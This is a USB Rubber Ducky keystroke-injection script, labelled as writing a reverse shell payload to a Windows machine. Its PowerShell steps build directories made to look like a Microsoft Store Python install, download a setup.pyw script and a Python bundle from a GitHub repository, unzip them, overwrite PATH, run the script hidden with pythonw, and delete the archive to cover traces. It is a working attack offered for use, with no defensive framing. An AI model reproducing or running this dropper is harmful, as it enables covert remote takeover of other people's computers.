REM Rubber Ducky Script to Write Reverse Shell Payload
################################################################################ STARTING ##############################################################################################
DELAY 500
GUI r
DELAY 500
STRING powershell mkdir C:\Users\$env:USERNAME\AppData\Local\Microsoft\WindowsApps
DELAY 500
ENTER
##############################################################################################################################################################################
DELAY 500
GUI r
DELAY 500
STRING powershell mkdir C:\Users\$env:USERNAME\AppData\Local\Microsoft\WindowsApps\PythonSoftwareFoundation.Python.3.12_qbz5n2kfra8p0
DELAY 500
ENTER
##############################################################################################################################################################################
DELAY 500
GUI r
DELAY 500
STRING powershell SETX PythonPath "C:\Users\$env:USERNAME\AppData\Local\Microsoft\WindowsApps\PythonSoftwareFoundation.Python.3.12_qbz5n2kfra8p0"
DELAY 500
ENTER
##############################################################################################################################################################################
DELAY 500
GUI r
DELAY 500
STRING powershell invoke-webrequest -uri "https://raw.githubusercontent.com/SmartBoyMuzaffar/Reverse-SHELL/master/setup.py" -outfile "$env:PythonPath\setup.pyw"
DELAY 1000
ENTER
##############################################################################################################################################################################
DELAY 1000
GUI r
DELAY 1000
STRING powershell invoke-webrequest -uri "https://github.com/SmartBoyMuzaffar/Reverse-SHELL/raw/master/python-3.12.zip" -outfile "$env:PythonPath\python-3.12.zip"
DELAY 1000
ENTER
##############################################################################################################################################################################
DELAY 15000
GUI r
DELAY 500
STRING powershell.exe tar -xf $env:PythonPath\python-3.12.zip -C $env:PythonPath
DELAY 1000
ENTER
##############################################################################################################################################################################
DELAY 3000
GUI r
DELAY 500
STRING powershell.exe SETX PATH $env:PythonPath
DELAY 1000
ENTER
##############################################################################################################################################################################
DELAY 1000
GUI r
DELAY 500
STRING powershell.exe pythonw $env:PythonPath\setup.pyw
DELAY 1000
ENTER
##############################################################################################################################################################################
DELAY 10000
GUI r
DELAY 1000
STRING powershell.exe rm $env:PythonPath\python-3.12.zip
DELAY 1000
ENTER
################################################################################## FINISHING ##################################################################################
